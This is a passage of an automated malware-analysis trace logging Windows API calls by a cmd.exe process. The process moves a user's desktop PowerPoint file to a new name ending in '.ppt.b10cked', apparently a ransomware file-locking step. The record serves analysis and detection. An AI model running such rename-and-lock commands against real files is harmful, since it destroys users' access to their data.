_Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aeac8 | out: _Buffer=" 1") returned 9 [0231.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.521] GetFileType (hFile=0x7) returned 0x2 [0231.599] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0231.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aea54 | out: lpMode=0x1aea54) returned 1 [0231.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aea88 | out: lpConsoleScreenBufferInfo=0x1aea88) returned 1 [0231.600] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0231.600] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeac8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0231.601] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aeaac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aeaac*=0x1a) returned 1 [0231.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.601] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.601] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.602] SetConsoleInputExeNameW () returned 0x1 [0231.602] GetConsoleOutputCP () returned 0x1b5 [0231.602] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.602] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.602] exit (_Code=0) Process: id = "613" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0x130" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34408 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 34409 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34410 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34411 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34412 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34413 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 34414 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34665 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34666 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34667 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34668 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34669 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34670 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34671 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34672 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34673 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34674 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34675 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34676 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34677 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34678 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34749 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 34750 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34751 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34752 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34753 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34754 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34755 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 34756 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 34757 start_va = 0x10e0000 end_va = 0x1242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 34758 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 853 os_tid = 0xd98 [0231.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7dc | out: lpSystemTimeAsFileTime=0x28f7dc*(dwLowDateTime=0xbdc8dfc0, dwHighDateTime=0x1d440a9)) [0231.917] GetCurrentProcessId () returned 0x130 [0231.917] GetCurrentThreadId () returned 0xd98 [0231.917] GetTickCount () returned 0x3fd03 [0231.917] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7d4 | out: lpPerformanceCount=0x28f7d4*=28870602789) returned 1 [0231.918] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.918] __set_app_type (_Type=0x1) [0231.918] __p__fmode () returned 0x76b331f4 [0231.918] __p__commode () returned 0x76b331fc [0231.918] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.918] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.918] GetCurrentThreadId () returned 0xd98 [0231.918] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38 [0231.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.918] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.918] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.923] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f76c | out: phkResult=0x28f76c*=0x0) returned 0x2 [0231.923] VirtualQuery (in: lpAddress=0x28f7a3, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.923] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.923] GetConsoleOutputCP () returned 0x1b5 [0231.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.971] GetEnvironmentStringsW () returned 0xa0168* [0231.971] FreeEnvironmentStringsW (penv=0xa0168) returned 1 [0231.971] GetEnvironmentStringsW () returned 0xa0168* [0231.971] FreeEnvironmentStringsW (penv=0xa0168) returned 1 [0231.971] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6dc | out: phkResult=0x28e6dc*=0x40) returned 0x0 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x90, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x0, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.971] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegCloseKey (hKey=0x40) returned 0x0 [0231.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6dc | out: phkResult=0x28e6dc*=0x40) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x40, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x0, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x9, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x9, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x9, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegCloseKey (hKey=0x40) returned 0x0 [0231.972] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.972] srand (_Seed=0x5b8863bf) [0231.972] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"" [0231.972] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"" [0231.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.973] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.973] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.973] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.973] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.973] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.973] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.973] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.973] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.974] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.974] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.974] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.974] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.974] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.974] GetEnvironmentStringsW () returned 0xa22b8* [0231.974] FreeEnvironmentStringsW (penv=0xa22b8) returned 1 [0231.974] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.974] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.974] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.974] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.974] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.974] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.974] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.974] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.974] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.974] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.974] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4a8, lpFilePart=0x28f4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f4a4*="Desktop") returned 0x18 [0231.975] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.975] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f224 | out: lpFindFileData=0x28f224) returned 0x9fff8 [0231.975] FindClose (in: hFindFile=0x9fff8 | out: hFindFile=0x9fff8) returned 1 [0231.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f224 | out: lpFindFileData=0x28f224) returned 0x9fff8 [0231.975] FindClose (in: hFindFile=0x9fff8 | out: hFindFile=0x9fff8) returned 1 [0231.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f224 | out: lpFindFileData=0x28f224) returned 0x9fff8 [0231.976] FindClose (in: hFindFile=0x9fff8 | out: hFindFile=0x9fff8) returned 1 [0231.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.976] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.976] GetEnvironmentStringsW () returned 0xa2ad8* [0231.976] FreeEnvironmentStringsW (penv=0xa2ad8) returned 1 [0231.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.977] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.995] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5e8, cchData=128 | out: lpLCData="0") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5e8, cchData=128 | out: lpLCData="0") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5e8, cchData=128 | out: lpLCData="1") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.997] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.998] GetConsoleTitleW (in: lpConsoleTitle=0x908d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.041] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.041] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.042] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.042] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.043] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.043] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.043] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.043] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.043] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.043] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.046] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.137] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.137] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.137] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.137] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.137] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.137] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.137] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.137] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.137] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="CLS") returned 